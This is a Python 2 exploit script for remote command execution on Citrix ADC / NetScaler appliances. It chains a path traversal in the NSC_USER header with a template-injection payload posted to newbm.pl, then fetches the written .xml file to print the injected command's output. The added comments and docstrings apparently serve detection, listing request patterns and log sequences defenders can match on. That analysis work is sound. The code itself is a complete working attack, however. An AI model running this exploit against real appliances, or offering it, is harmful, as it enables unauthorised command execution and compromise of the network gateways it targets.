Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
# Per-run suffix: the current epoch time rendered as a string. upload_file() and
# trigger() both append it to the fixed name "HELLO", so the file name differs
# on every run. A detection keyed on an exact file name will therefore miss it.
append_value = str(time.time())
# Author banner. The print *statement* form means this script is Python 2 only.
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
    """Send the first of the two requests: a POST to newbm.pl carrying a template.

    url     -- base URL of the appliance; the endpoint path is appended as-is.
    payload -- command string substituted for {CMD} inside the template text.

    Returns nothing. The response is held in a local and discarded, so the
    caller cannot tell from this function whether the request was accepted.

    What a defender can match on, taken from the request built here:
      * POST to /vpns/portal/scripts/newbm.pl.
      * An NSC_USER header containing "../" sequences that resolve towards
        /netscaler/portal/templates/. A user-name header has no reason to
        contain path separators, which makes this the most stable signal.
      * A 'desc' form field holding a "[% ... %]" template directive with
        backticks.
      * NOTE(review): presumably the handler writes an .xml file named after
        NSC_USER, since trigger() later requests HELLO<suffix>.xml. If so,
        unexpected .xml files under /netscaler/portal/templates/ are the
        on-disk artifact. Confirm against an affected build.
    The "HELLO" prefix and the field values are arbitrary choices of this
    script, so signatures should key on the traversal in NSC_USER and on the
    endpoint rather than on those strings.
    """
    endpoint = url + "/vpns/portal/scripts/newbm.pl"
    # The command is spliced into the template text unescaped.
    template = "[% template.new('BLOCK'='print `{CMD}`') %]".replace("{CMD}",payload)
    # Only 'desc' carries the template; the other fields are fixed filler values.
    data = {'url': 'hello.com', 'title': 'ohno', 'desc': template, 'UI_inuse': 'RfWeb'}
    # NSC_USER is where the path traversal lives; NSC_NONCE is a fixed string.
    headers = {'NSC_USER':'../../../../../../netscaler/portal/templates/HELLO'+append_value,'NSC_NONCE':'nsroot'}
    r = requests.post(endpoint,data=data, headers=headers)
    # Disabled debug output left in by the author:
    # print r.text
    # print endpoint
def trigger(url):
    """Send the second request: GET the per-run .xml name and print the reply.

    url -- base URL of the appliance; must be the same one given to
           upload_file(), because both derive the name from append_value.

    Returns nothing; the response body is printed to stdout unconditionally,
    with no status-code check.

    Defender view: a GET for /vpns/portal/<name>.xml carrying NSC_USER and
    NSC_NONCE headers, arriving right after a POST to newbm.pl.
    NOTE(review): presumably the body contains the command's output when the
    template is rendered. The script does not check this; confirm on an
    affected build.
    """
    trigger_url = url + "/vpns/portal/HELLO" + append_value + ".xml"
    # Fixed header values; unlike upload_file(), no traversal is present here.
    headers = {'NSC_USER':'nsroot','NSC_NONCE':'nsroot'}
    r = requests.get(trigger_url, headers=headers)
    print r.text
# Entry point: needs two positional arguments, a base URL and a command string.
if(len(sys.argv)>2):
    url = sys.argv[1]
    command = sys.argv[2]
    print "[+] Sending exploit to: "+ url + " [+]"
    # Two requests per run, always in this order. In access logs this is a POST
    # to newbm.pl followed by a GET for an .xml under /vpns/portal/.
    upload_file(url,command)
    trigger(url)
else:
    # Fewer than two arguments: print usage; no request is sent.
    print "Not enough parameters passed."
    print "python exploit.py URL COMMAND"